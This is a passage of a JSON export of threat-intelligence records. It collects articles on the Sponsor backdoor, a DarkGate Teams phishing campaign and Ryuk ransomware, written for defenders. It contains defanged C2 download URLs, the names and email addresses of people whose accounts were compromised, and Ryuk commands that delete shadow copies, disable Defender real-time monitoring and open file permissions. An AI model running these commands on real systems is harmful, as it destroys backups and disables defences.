  "file_type": null,
  "website_url": "https://www.bleepingcomputer.com/news/security/iranian-hackers-backdoor-34-orgs-with-new-sponsor-malware/",
  "website_title": "Iranian hackers backdoor 34 orgs with",
  "file_name": null,
  "file_size": null,
  "content": "A nation-state threat actor known as 'Charming Kitten' (Phosphorus, TA453, APT35/42) has been observed deploying a previously unknown backdoor malware named 'Sponsor' against 34 companies around the globe. One of the notable features of the Sponsor backdoor is that it hides its otherwise innocuous configuration files on the victim's disk so they can be discreetly deployed by malicious batch scripts, successfully evading detection. The campaign identified by ESET researchers spanned between March 2021 and June 2022, targeting government and healthcare orgs and firms engaged in financial services, engineering, manufacturing, technology, law, telecommunications, and more. The most targeted countries in the campaign observed by ESET are Israel, Brazil, and the United Arab Emirates. ESET reports that Charming Kitten primarily exploited CVE-2021-26855, a Microsoft Exchange remote code execution vulnerability, to gain initial access to its targets' networks. From there, the hackers used various open-source tools that facilitate data exfiltration, system monitoring, and network infiltration and also help the attackers maintain access to the compromised computers. Before deploying the Sponsor backdoor, the final payload seen in these attacks, the hackers drop batch files on specific file paths on the host machine, which writes the required configuration files. These files are named config.txt, node.txt, and error.txt to blend in with regular files and avoid raising suspicions. Sponsor is a C++ backdoor that creates a service upon launch as instructed by the configuration file, which also contains encrypted command and control (C2) server addresses, C2 contacting intervals, and the RC4 decryption key. The malware gathers system information like the OS build (32 or 64-bit) power source (battery or plug) and sends it to the C2 via port 80, receiving a node ID back, which is written to the configuration file. Next, the Sponsor backdoor enters a loop where it contacts the C2 in time intervals defined by the configuration file to acquire commands for execution on the host. Here's a list of the supported commands: ESET has also seen a second version of Sponsor, which features code optimizations and a layer of disguise that makes it appear as an updater tool. Although none of the IP addresses used in this campaign are online anymore, ESET has shared full IOCs to help defend against potential future threats that reuse some of the tools or infrastructure Charming Kitten deployed in that campaign. New malware infects business routers for data theft, surveillance CISA: New Whirlpool backdoor used in Barracuda ESG hacks CISA: New Submarine malware found on hacked Barracuda ESG appliances FIN8 cybercrime gang backdoors US orgs with new Sardonic malware Facebook Messenger phishing wave targets 100K business accounts per week Not a member yet? Register Now Microsoft Teams phishing attack pushes DarkGate malware Google rolls out Privacy Sandbox to use Chrome browsing history for ads Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure Copyright @ 2003 - 2023 Bleeping Computer® LLC - All Rights Reserved           NEWS           DOWNLOADS           VPNS      VIRUS REMOVAL GUIDES                TUTORIALS           DEALS      FORUMS MORE       Home News Security Iranian hackers backdoor 34 orgs with new Sponsor malware    September 11, 2023 12:19 PM 0 Sends running Sponsor process ID. Executes a specified command on Sponsor host and reports results to the C2 server. Receives and runs a file from C2 with various parameters and communicates success or errors to C2. Downloads and runs a file via Windows API and reports to C2. Runs Uninstall.bat from the current directory. Sleeps randomly before reconnecting with the C2 server. Updates C&Cs list in config.txt and reports to C2. Adjusts check-in interval in config.txt and reports to C2. APT35 APT42 BACKDOOR CHARMING KITTEN IRAN MALWARE PHOSPHORUS SPONSOR      PREVIOUS ARTICLE NEXT ARTICLE Microsoft Teams phishing attack pushes DarkGate malware Google rolls out Privacy Sandbox to use Chrome browsing history for ads      News VPN Buyer Guides Downloads Virus Removal Guides Tutorials Startup Database Uninstall Database Glossary Forums Forum Rules Chat Welcome Guide Sitemap About BleepingComputer Contact Us Send us a Tip! Advertising Write for BleepingComputer Social & Feeds Changelog",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-11T18:36:47.849Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64ff79e739ffeb5aa0e25408"
  },
  "name": "DarkGate",
  "file_type": null,
  "website_url": "https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams",
  "website_title": "DarkGate Loader Malware Delivered via Microsoft",
  "file_name": null,
  "file_size": null,
  "content": "In the last week of August, Truesec Cybersecurity Incident Response Team (CSIRT) investigated a Microsoft Teams malware campaign delivering malware identified as DarkGate Loader. On August 29, in the timespan from 11:25 to 12:25 UTC, Microsoft Teams chat messages were sent from two external Office 365 accounts compromised prior to the campaign. The message content aimed to social engineer the recipients into downloading and opening a malicious file hosted remotely. Using Microsoft Purview's eDiscovery tool we searched for the senders (participants) in Microsoft Teams. The senders of the external Microsoft Teams chat messages were identified as “Akkaravit Tattamanas” (63090101@my.buu.ac.th) and “ABNER DAVID RIVERA ROJAS” (adriverar@unadvirtual.edu.co). Truesec Threat Intelligence confirmed the accounts were compromised via an unknown malware and put up for sale on the Dark Web in August 2023. Using AADInternal's OSINT tool, we could gather more information on the O365 tenant to which the accounts belong and use the listed domains to search for additional messages. Both senders had an identical-sounding message with a link to an externally hosted file, \"Changes to the vacation schedule.zip\" (hosted on the senders SharePoint sites). The SharePoint URLs hosting the remote attachment can be seen in the figure below. Clicking the URL would take the victim to the SharePoint sites where the file “Changes to the vacation schedule.zip” could be downloaded. The file was later identified by Microsoft Defender as malware “BAT/Tisifi.A#”. Using a combination of static and dynamic malware analysis our goal was to identify the final payload delivered in the campaign. The ZIP file contains a malicious LNK file (shortcut) posing as a PDF document: \"Changes to the vacation schedule.pdf.lnk.\" Using Eric Zimmerman’s “LECmd.exe” to analyze the malicious LNK file, we can extract the command line it would execute upon opening. The execution of the VBScript file in C:\\tgph\\asrxmp.vbs triggers the download and execution of the file hXXp:// 5[.]188[.]87[.]58:2351/wbzadczl The commands make use of a Windows version of cURL (renamed to wbza) to download and execute Autoit3.exe and the bundled script eszexz.au3. The pre-compiled AutoIT script hides the code in the middle of the file by looking for the magic bytes 0x4155332145413036 (AU3!EA06). Upon executing the script, AutoIT drops a new file that contains shellcode, and before execution, it makes a check to see if Sophos antivirus is installed. If Sophos is not installed, additional code in the AutoIT script is deobfuscated to launch the shellcode. When the shellcode is run, the first thing it does is load “byte by byte.” This technique is called stacked strings, to create a new file. It can be seen in the figure below that the first bytes of the created file are 0x4d and 0x5a, which indicates a Windows executable. The payload could then be extracted from memory and analyzed with PE Studio from www.winitor.com: The payload was identified as “DarkGateLoader” on VirusTotal. After the identification of the malware, we found an excellent writeup from Deutsche Telekom CERT and used their config extractor on the AutoIT script file “eszexz.au3” to extract the DarkGate malware’s configuration: Further reading on the DarkGate Loader and DarkGate malware capabilities: https://github.security.telekom.com/2023/08/darkgate-loader.html https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/ This attack was detected due to the security awareness training of the recipients. Unfortunately, current Microsoft Teams security features such as Safe Attachments or Safe Links was not able to detect or block this attack. Right now, the only way to prevent this attack vector within Microsoft Teams is to only allow Microsoft Teams chat requests from specific external domains, albeit it might have business implications since all trusted external domains need to be whitelisted by an IT administrator. More on how these settings can be activated and used can be found here: https://learn.microsoft.com/en-us/microsoftteams/trusted-organizations-external-meetings-chat?tabs=organization-settings Filename SHA256 Hash Changes to the vacation schedule.zip 0c59f568da43731e3212b6461978e960644be386212cc448a715dbf3f489d758 Changes to the vacation schedule.pdf.lnk bcd449470626f4f34a15be00812f850c5e032723e35776fb4b9be6c7be6c8913 c:\\tgph\\asrxpm.vbs 4c21711de81bb5584d35e744394eed2f36fef0d93474dfc5685665a9e159eef1 c:\\wbza\\eszexz.au3 1bcde4d4613f046b63e970aa10ea2662d8aa7d326857128b59cb88484cce9a2d A similar file with the same filename, “Changes to the vacation schedule.zip,” and behavior (but with a different hash) is available on VirusTotal: https://www.virustotal.com/gui/file/09904d65e59f3fbbbf38932ae7bff9681ac73b0e30b8651ec567f7032a94234f. URLs hXXps://burapha-my[.]sharepoint[.]com/:u:/g/personal/63090101_my_buu_ac_th/EWkB0l3nR4dCjDmwAe7jb7kBWPPkDObt8wVbmB1O6UztmA hXXps://unadvirtualedu-my[.]sharepoint[.]com/personal/adriverar_unadvirtual_edu_co/Documents/Microsoft%20Teams%20Chat%20Files/Changes%20to%20the%20vacation%20schedule.zip hXXp://5[.]188[.]87[.]58:2351/wbzadczl hXXp:// 5[.]188[.]87[.]58:2351/msiwbzadczl Command & Control Server hXXp://5[.]188[.]87[.]58:2351 Compromised Email Addresses 63090101@my.buu.ac.th adriverar@unadvirtual.edu.co Join 1000+ other cyber professionals and get our regular updates with cyber knowledge and technical know-how. By clicking “Submit,” I acknowledge receipt of the Truesec Privacy Policy. Phone:\n+46 8 10 00 10\nE-mail:\nhello@truesec.com Sweden:\nHeadquarters\nStockholm\nLuntmakargatan 18\n111 37 Stockholm Malmö\nTorggatan 4\nSeventh Floor\n211 40 Malmö Karlskrona\nDrottninggatan 54\nSecond Floor\n371 33 Karlskrona United States:\nTruesec Inc.\n1300 Riverplace Boulevard\nSuite 210\nJacksonville, FL 32207\n(904) 900-4532\nus.truesec.com Denmark:\nHeadquarters\nCopenhagen\nGlentevej 69, 1.\n2400 Copenhagen Aarhus\nTruesec A/S\nSøren Frichs Vej 36F\n8230 Aarhus   © Truesec                                                                   By clicking “Submit,” I acknowledge receipt of the Truesec Privacy Policy. Identify Your Vulnerabilities and Risks Develop and Manage Your IT Securely Detect and Respond to Intrusion Respond to and Quickly Overcome a Cyber Attack Get Cybersecurity Advice Our Services Who We Are Careers Our Experts English Newsroom Swedish Newsroom Business Policy ISO Certified Cybersecurity Knowledge and Resources Events Tech Talks Trainings Blog News Facebook Twitter LinkedIn  Privacy Policies and Terms Report Concerns",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-11T20:34:47.638Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-11T20:39:52.164Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64ff7b6839ffeb5aa0e25409"
  },
  "name": "DarkGate",
  "file_type": null,
  "website_url": "https://www.databreachtoday.co.uk/darkgate-malware-operators-on-phishing-spree-a-23054",
  "website_title": "DarkGate Malware Operators on a Phishing",
  "file_name": null,
  "file_size": null,
  "content": "Fraud Management & Cybercrime , Social Engineering Advertising on Russian-language criminal forums is paying off for the author of the DarkGate malware as reflected by a spike in infections, including an unusual phishing campaign on Microsoft Teams to deliver the loader through HR-themed social engineering chat messages. See Also: Live Webinar | Cyber Resilience: Recovering from a Ransomware Attack Cyber defenders first spotted the DarkGate commodity loader in 2018. Researchers from Deutsche Telekom in late August said the commodity loader's coder this summer began renting out the malware to a limited number of affiliates. \"Before that, the malware was only used privately by the developer,\" the researchers said to explain the intensified email spamming campaign to lure victims into downloading DarkGate. In June 2023, ZeroFox reported that someone claiming to be the original author of DarkGate had promoted access of the malware to just 10 people for an annual price of $100,000. Researchers from TrueSec now said they've spotted threat actors abusing compromised Office 365 accounts to send phishing messages containing a DarkGate Loader malware on Microsoft Teams to an unnamed organization. The bait was a link to a SharePoint-hosted file named \"Changes to the vacation schedule.zip.\" Microsoft Teams security features such as Safe Attachments and Safe Links did not detect or block the malicious attack, said TrueSec. Researches from Kaspersky said DarkGate's capabilities include hidden VNC, Windows Defender exclusion, browser history stealing, reverse proxy, file management, and Discord token stealing. The features \"go beyond typical downloader functionality,\" they wrote. Malwarebytes in late August uncovered an additional vector of DarkGate infection: malvertising. Bad actors behind the dropper bought ads on the Google search engine. Victims who clicked on the advertising saw a fake webpage masquerading as a popular network scanning tool offering a download containing the legitimate app \"but also some extra files,\" i.e., DarkGate. Principal Correspondent, Global News Desk, ISMG Bagwe previously worked at CISO magazine, reporting the latest cybersecurity news and trends and interviewing cybersecurity subject matter experts.  Covering topics in risk management, compliance, fraud, and information security. By submitting this form you agree to our Privacy & GDPR Statement Fraud Management & Cybercrime Fraud Management & Cybercrime Fraud Management & Cybercrime Access Management General Data Protection Regulation (GDPR)                      Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing databreachtoday.co.uk, you agree to our use of cookies. ISMG Network           UK        Sign in Register CyberEd.io Membership Live In-Person Event - London Cybersecurity Summit 19 Sept.\n• Boards and Security Leaders: Share Your Perspectives on Cybersecurity Risk\n•          Share Tweet Share Credit Eligible  Get Permission  Fraud Management & Cybercrime Social Engineering    Share Tweet Share Credit Eligible  Get Permission  News Training Resources Events Jobs About Us Editorial Board of Advisers Press Advertise Contact DDoS Resource Center FFIEC Authentication Guidance GDPR HIPAA Omnibus Rule Ransomware Security Intelligence COVID-19",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-11T20:41:12.530Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-11T20:42:58.935Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "6500cd8d706f6f9074be79c8"
  },
  "name": "Ryuk Ransomware",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Ryuk Ransomware.pdf",
  "file_size": "129 KB",
  "content": "Ryuk is the name of a ransomware family, first introduced in August 2018. Once known as a\npopular Japanese fictional character, became one of the most vicious ransomware families ever\nknown to humanity, targeting governments, healthcare, education centres, manufacturing and\ntechnology organizations. Ryuk ransomware acquired a reputation of being one of the most\nnotorious ransomware within a short span of 15 months, with its terror looming over large\norganizations. Victims include EMCOR, UHS hospitals, and several newspapers. It was\nestimated that Ryuk was able to generate a revenue of $61 million for its operators between\nFebruary 2018 and October 2019. With its first appearance in August 2018, Ryuk gained\nattention by targeting the operations of Tribune Publishing newspapers during the Christmas\nseason of 2018. Initially, what looked like a server outage was the outcome of a targeted\nmalware attack, with Ryuk reinfecting the network because the security patches failed to contain\nthe malware post quarantine. The primary motive of this ransomware variant is to ensure\nmaximum target file encryption to hold a massive amount at ransom. Additionally, Ryuk can\nidentify and encrypt network drivers and includes system shadow copies, making it impossible\nto recover from an attack without external backups or rollback technology. This blog will entail\nthe complete attack flow of the Ryuk ransomware group, allowing security practitioners to test\ntheir cybersecurity posture against the full range of techniques and procedures that Ryuk used.\nThe techniques and procedures covered in this blog are aggregated from various sources and\nreports compiled to provide the reader with a good overview of the Ryuk TTPs. Below you will\nfind a brief timeline of incidents involving the Ryuk ransomware group[6]: Moving forward, the\nRyuk Infection chain and attack flow **already part of the FourCore ATTACK Security Validation\nPlatform will enable security practitioners to: The next part of this blog will cover the Ryuk\ninfection chain and the public reports available: The operators behind the Ryuk ransomware\ntake a targeted approach to select and infect their victims. Rather than attempting to infect many\ncomputers and asking a relatively small ransom (like WannaCry), campaigns using the Ryuk\nransomware focus on a single organization and have an extremely high asking price for data\nrecovery. Ryuk is a ransomware which encrypts its victim's files and asks for a ransom via\nbitcoin to release the original files. It has been observed to be used to attack companies or\nprofessional environments. Cybersecurity experts figured out that Ryuk and Hermes\nransomware shares pieces of code. The table shown below covers the MITRE ATT&CK tactics,\ntechniques, and procedures used in the Ryuk's attack cycle: Ryuk has been known to be a part\nof a more significant \"Triple Threat\" attack that involves Emotet and TrickBot. Being notoriously\nknown to be one of the most expensive ransomware variants, with average ransom demands\nreaching higher than $100,000 USD. Ryuk ransom notes contain an email address where\nvictims can communicate with the ransomware operators to receive instructions on how to pay\nthe ransom. However, this should be noted that there is no guarantee even if you submit the\nransom. In most of the observed cases, the ransomware operators will take the ransom without\nreturning access to the files. Paying a ransom demand should result in the cybercriminal\nsending a decryptor/decryption key. The ransom demand varies significantly based on observed\ntransactions to known Ryuk BTC addresses. This suggests that WIZARD SPIDER calculates\nthe ransom amount based on the size and value of the victim organization. From the early data\navailable, the observed ransom amount resided between 1.7-99 BTC. RYUK - Balance of\nshadow universe The dropper is loaded onto the victim's machine via a PowerShell, C2C\nretrieval. Once the dropper lands on the target asset, it will check the MajorVersion property to\n\n\fdetermine the target operating system. If MajorVersion is equal to 5, then the dropper will place\nthe ransomware executable into the C:\\Documents and Setting\\Default User folder. That's the\ndefault ransomware download file for Windows Server 2003, XP, and Windows 2000. Otherwise,\nit drops it at C:\\users\\Public\\. In case of a lookup/file creation failure, the dropper drops Ryuk\nmalware in the execution directory of the dropper itself. The name of the dropped executable is\nfive randomly generated characters. Next, it determines the target system's architecture by\ncalling the IsWow64Process() API. Before the dropper exits, it launches the second stage\nexecutor using the ShellExecuteW API and passes its path as a command line argument,\ndeleting the dropper binary. Ryuk uses the Windows Registry to ensure post-reboot execution\nby adding an entry to the key\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos and\nvalue set to the executable path: C:\\users\\Public\\BPWPc.exe. The instruction is /v \"svchos\"/t\nREG_SZ/d allows the malware to run after every login. Ryuk obtains further permissions by\nmodifying the SeDebugPrivilege argument of the AdjustTokenPrivileges() API to adjust its\nprocess security access token. According to MSDN, SeDebugPrivilege is required to debug and\nmodify the memory of a process owned by another account. The user can attach a debugger to\nany process or kernel with this privilege. Ryuk tries to enumerate all the running processes\nusing the CreateToolHelp32Snapshot API and identifies the user associated with each process\n(regular user/administrator/NT AUTHORITY). This step is essential to identify the target process\nfor injection. The code injection mechanism will ignore any system process named crsss.exe,\nlsaas.exe, explorer.exe, or anything running as NT AUTHORITY. Ryuk allocates memory for its\nprocess at the target process memory space using VirtualAllocEx(), then copies and maps the\npacked code section into the target process's allocated virtual memory using\nWriteProcessMemory() API. Finally, it creates a new thread using CreateRemoteThread() to run\nRyuk's thread in the injected process. It is a commonly known practice that a static binary with\nmany imports can look malicious from the EDRs PoV. Therefore, most malware authors resolve\ntheir function imports dynamically using LoadLibraryA() and GetProcAdress() APIs. Here is the\ncomplete list of all the APIs post-resolution: Ryuk ransomware will kill or put to sleep up to 180\nsystem and AV-related services and up to 40 processes. The services and processes are killed\nusing the net stop and taskkill /IM commands. Targetted Services: Targetted Processes: Ryuk\nruns a batch script in C:\\Users\\Public\\window.bat, which deletes all shadow copies and possible\nbackups, and then deletes itself. The operations include: vssadmin resize is unique; in the case\nof any third-party backup provider, vssadmin can display an error while trying to delete the\nbackups indicating the presence of these backups outside the allowed context. Ryuk uses the\nabove command, tasking vssadmin to delete storage when the shadow copies are resized. It\nforces the shadow copies to be deleted regardless of their context. The del /s /q command\ndeletes various files based on their extension and folder locations. Extensions include:- .vhd,\n.bac, .bak, .wbcat, .bfk, .set, .win, .dsk and any folder with a prefix \"Backup\" in it. While the goal\nof Ryuk is to make the most money, Ryuk does not have many safeguards to ensure the\nstability of the host while encrypting the target system files. Ryuk avoids encrypting files with\nextensions .exe, .dll, .hrmlog (a debug log made by the Hermes Developer - plug: there are\nmany similarities between Hermes and Ryuk, check references for more). While safe listing the\nabove extensions, there is no provision to whitelist system drivers (.sys), OLE control extension\n(.ocx) and other executable file types. Encrypting these files could make the host unstable. Due\n\n\fto the absence of proper whitelisting, an infected machine can become unstable over time and\nunbootable if restarted. Ryuk uses a combination of symmetric (AES) and asymmetric (RSA)\nencryption to encrypt files. Without the private key provided by WIZARD SPIDER, the files\ncannot be decrypted and are unrecoverable. It starts enumerating files using FindFirstFileW()\nand FindNextFileW() then it passes each file name to a new encryption thread. Each encryption\nthread starts by generating a random 256 AES encryption key using CryptGenKey(). Unlike\nmodern Go malware, Ryuk utilizes the Windows Crypto API for the encryption process. Then, it\ngoes into the typical encryption loop, and the files are encrypted in chunks with a chunk size of\n1000000 bytes. Finally, Ryuk writes a metadata block of size 274 bytes* at the end of the file.\nThe first *6 bytes* are the keyword HERMES. Finally, the AES key is encrypted with an RSA\npublic key before it's written to the end of the file and then exported using CryptExportKey(); this\nfunction generates 12 bytes of Blob information + 256 bytes (the encrypted key). The RSA\npublic key is embedded in the executable. It's imported using CryptImportKey() and passed to\nevery encryption thread. After the file has been encrypted, a file extension of .RYK is appended\nto the file. All directories will have a ransom note RyukReadMe.txt written to the directory. Ryuk\nis one of the few ransomware which enumerates and encrypts network shares. It performs this\noperation by enumerates network shares using WNetOpenEnumW() and\nWNetEnumResourceA() respectively. For each network resource found, the drive path will get\nappended to a list separated by a semicolon. This list will be used later to encrypt these network\nshares with the same encryption process above. Analysis Report for the above execution\npresent here. Hashes: Registry:\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Emails\n(primarily random): Files: Ryuk drops the ransom note, RyukReadMe.html or RyukReadMe.txt,\nin every folder where it has encrypted files. Based on the aggregated threat intelligence reports\nand mapping to the MITRE ATT&CK matrix, FourCore has released a Ryuk Ransomware\nAdversary Simulation Assessment. While the payloads used by the ATTACK platform are\ncomplex, dynamic, and native, for ease of this assessment, we will be providing\nCmd/Powershell commands to execute similar behaviour. T1059 - Command and Scripting\nInterpreter Ryuk has used cmd.exe to create a Registry entry to establish persistence and\ncreate directory for Ryuk AD scan. T1059.001 - PowerShell Ryuk uses powershell to configure\nthe Microsoft Defender Real-Time scanning. It also uses to compress files into archives.\nT1059.003 - Windows Command Shell Ryuk has used cmd.exe to create a Registry entry to\nestablish persistence. T1053 - Scheduled Task/Job Ryuk can remotely create a scheduled task\nto execute itself on a system. T1053.005 - Scheduled Task/Job: Scheduled Task Ryuk can\nremotely create a scheduled task to execute itself on a system. T1106 - Native API Ryuk has\nused multiple native APIs including ShellExecuteW to run executables,GetWindowsDirectoryW\nto create folders, and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process\ninjection.[1] T1055 - Process Injection Ryuk has injected itself into remote processes to encrypt\nfiles using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.\nT1134 - Access Token Manipulation Ryuk has attempted to adjust its token privileges to have\nthe SeDebugPrivilege. T1140 - Deobfuscate/Decode Files or Information Ryuk uncompresses\nthe dowloaded archive in a temporary directory. T1222.001 - File and Directory Permissions\nModification: Windows File and Directory Permissions Modification Ryuk can launch icacls\n/grant Everyone:F /T /C /Q to delete every access-based restrictions on files and directories.\n\n\fT1562.001 - Impair Defenses: Disable or Modify Tools Ryuk has stopped services related to\nanti-virus. Ryuk used encoded powershell command to disable Microsoft Windows Defender\nService. (Set-MpPreference -DisableRealtimeMonitoring $true) T1036 - Masquerading Ryuk can\ncreate .dll files that actually contain a Rich Text File format document. T1036.005 - Match\nLegitimate Name or Location Ryuk has constructed legitimate appearing installation folder paths\nby calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the\npath. For Windows Vista or higher, the path would appear as C:\\Users\\Public. T1027 -\nObfuscated Files or Information Ryuk can use anti-disassembly and code transformation\nobfuscation techniques. T1205 - Traffic Signaling Ryuk has used Wake-on-Lan to power on\nturned off systems for lateral movement. T1018 - Remote System Discovery Ryuk uses\ncmd.exe and powershell.exe to discover remote systems. T1057 - Process Discovery Ryuk has\ncalled CreateToolhelp32Snapshot to enumerate all running processes. T1082 - System\nInformation Discovery Ryuk has called GetLogicalDrives to emumerate all mounted drives, and\nGetDriveTypeW to determine the drive type. T1083 - File and Directory Discovery Ryuk has\nenumerated files and folders on all mounted drives. T1087 - Account Discovery Ryuk may\nattempt to get a listing of accounts on a system or within an environment. T1087.002 - Domain\nAccount Ryuk has the ability to identify domain administrator accounts. T1482 - Domain Trust\nDiscovery Ryuk use Nltest tools to obtain information about the domain. T1614.001 - System\nLocation Discovery: System Language Discovery Ryuk has been observed to query the registry\nkey HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language and the value\nInstallLanguage. If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423\n(Belarusian), it stops execution. T1016 - System Network Configuration Discovery Ryuk has\ncalled GetIpNetTable in attempt to identify all mounted drives and hosts that have Address\nResolution Protocol (ARP) entries. T1518 - Software Discovery Ryuk can query the registry to\nget the list of software installed. T1518.001 - Security Software Discovery Ryuk can query the\nCIM instance for the SecurityCenterv2 namespace to query the installed antivirus product name.\nT1071 - Application Layer Protocol Ryuk may communicate using application layer protocols to\navoid detection/network filtering by blending in with existing traffic. T1105 - Ingress Tool Transfer\nRyuk transfers a batch script designed to kill a list of processes and services as mentioned\nabove. Ryuk uses adfind.exe to query active directory. T1573 - Encrypted Channel Ryuk may\nemploy a known encryption algorithm to conceal command and control traffic rather than relying\non any inherent protections provided by a communication protocol. T1074 - Data Staged Ryuk\nmay stage collected data in a central location or directory prior to Exfiltration. Data may be kept\nin separate files or combined into one file through techniques such as Archive Collected Data.\nT1021.002 - Remote Services: SMB/Windows Admin Shares Ryuk has used the C$ network\nshare for lateral movement. T1078.002 - Valid Accounts: Domain Accounts Ryuk can use stolen\ndomain admin accounts to move laterally within a victim domain. T1078.003 - Valid Accounts:\nLocal Accounts Adversaries may obtain and abuse credentials of a local account as a means of\ngaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. T1041 -\nExfiltration Over C2 Channel T1486 - Data Encrypted for Impact Ryuk has used a combination\nof symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been\nencrypted with their own AES key and given a file extension of .RYK. Encrypted directories have\nhad a ransom note of RyukReadMe.txt written to the directory. T1490 - Inhibit System Recovery\nRyuk has used vssadmin Delete Shadows /all /quiet to to delete volume shadow copies and\n\n\fvssadmin resize shadowstorage to force deletion of shadow copies created by third-party\napplications. T1489 - Service Stop Ryuk has called kill.bat for stopping services, disabling\nservices and killing processes. Falling victim to a Ryuk ransomware attack is exceptionally\ncostly to an organisation. The operators of the Ryuk ransomware put effort into developing a\ntargeted spear phishing lure, and they demand a high ransom for their trouble. However,\nsometimes, even paying the ransom is not enough to regain a company's access to sensitive or\nvaluable data. For this reason, it is far better to prevent a ransomware attack rather than react to\nit. Therefore, it is essential to detect the attack at the beginning of the cycle; if your security\ncontrols can detect the Ryuk malware before encryption begins, the incident can be mitigated\nwithout harming the organisation. This brings in the need for a continuous assessment of your\norganisation's security posture to ensure that your security controls are tuned well and prevent\nsuch impactful actions from executing. Across the threat analysis of Ryuk, we see\ncommonalities regarding IOCs and TTPs and explicit commands and actions used by this\ncurrent version of the ransomware attack. The commands, paired with the detailed account of\ncompromise timelines, allow defenders some great insights into building up their defences\nagainst Ryuk. The bunch of suspicious commands a regular user would never execute include\nthe use of cmd.exe and PowerShell.exe to run commands like - The behaviours and TTPs\ndiscussed in this article should be logged and flagged. Ryuk targets a variety of services, few of\nwhich are specific to a third party; therefore, even alerting on services such as Sophos Agent or\nVeeam Backup going offline unexpectedly across your environment provides a vital IOC for\nRyuk. Finally, as with any ransomwares the ability to alert on massive and sweeping file\ncreation, deletion, and encryption is exceptionally insightful to an organisation as it permits\ndefenders to fine-tune their alerts. It is recommended that only administrators and end users\nwith specific needs be able to run administrative tools such as cmd, PowerShell, net, wmic,\nsysteminfo, arp, or route. Limiting these tools to only authorised users reduces the chance of a\ncompromised end user being able to enumerate system and environmental settings.\nAdditionally, from a detection PoV, we can implement various rules for alerts: Using splunk to\ndetect Ryuk Ransomware:\nhttps://www.splunk.com/en_us/blog/security/detecting-ryuk-using-splunk-attack-range.html\nHere's a Yara rule submitted by Marc Elias and Christian Beek of the McAfee ATR Team Ryuk\nBehaviour Detection using Sigma Rules: In summary, this attack flow for the Ryuk ransomware\ngroup will help security practitioners evaluate their security and incident response processes\nand improve their security control posture against an actor with focused operations to encrypt\nyour systems and data. FourCore ATTACK is a continuous security validation platform providing\nassessments for your entire security infrastructure to test and validate your security posture\nquickly and effectively. December 2018  Tribune Publishing attack March 2019  Jackson\nCounty's infrastructure was attacked. Damages: $400,000 (22 BTC). April 2019  Imperial\nCountys IT infrastructure gets hit by Ryuk. The attackers demanded $1.2 million (65 BTC).\nVictims refused to pay. June 2019  Lake City systems locked by ransomware. Victims had to\npay $460,000 (25 BTC) to regain control over their systems. July 2019  La Porte County, the\nRyuk ransomware hit public institutions. Victims had to pay $130,000 (7 BTC). August 2019 \nRockville Centre school district affected by Ryuk. The municipality had to pay $100,000 (5 BTC)\nto regain control. October 2019  Ryuk creators take down a hospital chain administrated by the\nNational Veterinary Associates. Over 400 clinics experienced downtimes in payment systems\n\n\fand patient curation systems. November 2019  Ryuk operators launch attacks against several\nHVTs: Louisiana Office of Technology Services, Prosegur (i.e. Spanish security company),\nCadena SER (the largest radio station in Spain), and T-System (E2E healthcare and emergency\nsolutions providers). January 2020  Ryuk operators attacked gas and oil facilities. In addition,\nthe same operators were found to be involved in several other incidents targeting healthcare\nproviders. September 2020  Universal Health Services (UHS) healthcare providers have\nreportedly shut down systems at healthcare facilities after a Ryuk ransomware attack. The\nincident resulted in about $67 million in lost operating income, labour expenses, and overall\nrecovery costs. January 2021  A new version with worm-like capabilities was identified. The\nnew Ryuk variant can spread automatically/without intervention through infected networks.\nMarch 2021  Ryuk targeted the systems of SEPE, the Spanish government agency for labour.\nThe systems were taken down following a ransomware attack that affected more than 700\nagency offices across Spain. April 2021  New Ryuk hacking techniques were revealed. The\nthreat actors' favourite initial infection vector continues to be the targeted phishing emails for\nmalware delivery. May 2021  Ryuk ransomware infects Bio Research Institute after a student\ninstalls pirated software. The attack occurred because the student didnt want to pay for a\nlicense, causing a weeks research data. Evaluate their security controls against the real-world\ntactics provinding the significance of its real-world impact. Assess the security posture against\nthe tactics, techniques and procedures (TTPs) used by the WIZARD Group's Ryuk variant\nContinuously validate detection and prevention pipelines against the destructive actions this\nransomware performs Ryuk is spread via very targeted means. These include using tailored\nspear phishing emails and exploiting compromised credentials to remotely access systems via\nthe Remote Desktop Protocol (RDP). The delivery method for Ryuk is through spam emails like\nvarious other malware attacks, often sent through spoofed addresses, to avoid raising\nsuspicion. A spearphishing email may carry Ryuk directly or be the first in a series of malware\ninfections. For example, Emotet, TrickBot, and Ryuk are common combinations. The attack\nchain begins when the user opens a weaponized Microsoft Office document attached to a\nphishing email. Opening the document causes a malicious macro to execute a PowerShell\ncommand that attempts to download the banking Trojan 